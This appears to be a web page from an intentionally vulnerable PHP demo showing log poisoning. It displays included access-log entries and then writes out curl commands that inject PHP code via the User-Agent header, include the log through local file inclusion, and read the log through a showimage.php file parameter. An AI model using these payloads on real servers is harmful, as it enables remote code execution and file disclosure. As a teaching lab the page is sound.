Log Injection / Log Poisoning Demo
Request logged.
Including log file (LFI via Log Poisoning):
[2026-07-10 16:37:03] IP: 37.27.135.61 | UA: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | URI: /logpoison.php [2026-07-10 16:37:04] IP: 37.27.135.61 | UA: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | URI: /logpoison.php?show=1 [2026-07-10 16:37:04] GET: show = 1 [2026-07-10 18:22:26] IP: 208.91.111.227 | UA: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) | URI: /logpoison.php [2026-07-10 18:24:29] IP: 208.91.111.227 | UA: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) | URI: /logpoison.php?show=1 [2026-07-10 18:24:29] GET: show = 1 [2026-07-10 19:34:55] IP: 208.91.111.227 | UA: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) | URI: /logpoison.php?include=1 [2026-07-10 19:34:55] GET: include = 1
Log Poisoning Attack
1. Inject PHP code into User-Agent header:
curl -A "<?php system('id'); ?>" "http://localhost/logpoison.php"
2. Then include the log file via LFI:
curl "http://localhost/logpoison.php?include=1"
Or use the LFI in showimage.php to read the log file:
showimage.php?file=/home/novalbnp/sandbox.novalbnps.my.id/logs/access.log